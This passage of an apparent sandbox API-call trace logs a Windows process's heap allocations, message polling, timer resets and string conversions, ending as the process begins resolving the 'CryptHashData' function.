lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0258.315] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0258.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0258.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0258.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0258.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0258.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0258.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0258.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0258.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0258.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0258.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0258.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0258.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55038 [0258.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0258.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0258.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0258.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0258.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f28, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0258.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0258.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0258.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0258.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0258.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0258.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0258.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0258.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0258.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0258.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0258.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0258.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0258.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0258.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0258.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0258.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0258.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0258.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0258.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0258.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0258.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0258.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0258.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0258.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0258.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0258.317] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0258.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0258.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0258.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0258.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0258.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0258.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0258.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0258.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0258.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0258.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0258.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0258.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0258.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0258.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0258.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0258.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0258.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55078 [0258.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0258.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0258.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0258.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0258.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0258.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0258.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0258.319] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0258.319] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0258.319] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0258.319] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0258.319] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0258.319] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0258.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0258.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0258.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0258.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0258.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0258.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0258.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0258.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0258.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0258.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0258.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0258.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0258.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0258.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0258.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55098 [0258.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0258.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0258.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0258.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0258.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54ff8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0258.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0258.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0258.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0258.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0258.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0258.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0258.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55048 [0258.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0258.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0258.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0258.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0258.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0258.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0258.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0258.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0258.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0258.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0258.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0258.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0258.387] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0258.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0258.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0258.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0258.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55bc8 [0258.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0258.387] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0258.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55bc8 | out: hHeap=0x970000) returned 1 [0258.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0258.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51250 [0258.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0258.387] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0258.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0258.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0258.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0258.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0258.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0258.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0258.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0258.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0258.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0258.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0258.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0258.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0258.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0258.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0258.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0258.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0258.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0258.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0258.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0258.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0258.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0258.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0258.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0258.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0258.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0258.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0258.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0258.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0258.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0258.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0258.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0258.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0258.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0258.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0258.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0258.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0258.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0258.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0258.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0258.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0258.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0258.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0258.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0258.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0258.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0258.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0258.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0258.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0258.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0258.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0258.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0258.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0258.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0258.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0258.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0258.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0258.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0258.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0258.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0258.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0258.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0258.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0258.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0258.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0258.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0258.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0258.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0258.389] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0258.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0258.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0258.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0258.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0258.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0258.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0258.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0258.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0258.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0258.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0258.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0258.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0258.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0258.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0258.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0258.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0258.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0258.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0258.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0258.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0258.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0258.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0258.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0258.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0258.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0258.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0258.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0258.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0258.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0258.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0258.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0258.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0258.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0258.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0258.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0258.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0258.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0258.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0258.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0258.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0258.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0258.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0258.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0258.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0258.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0258.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0258.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0258.391] 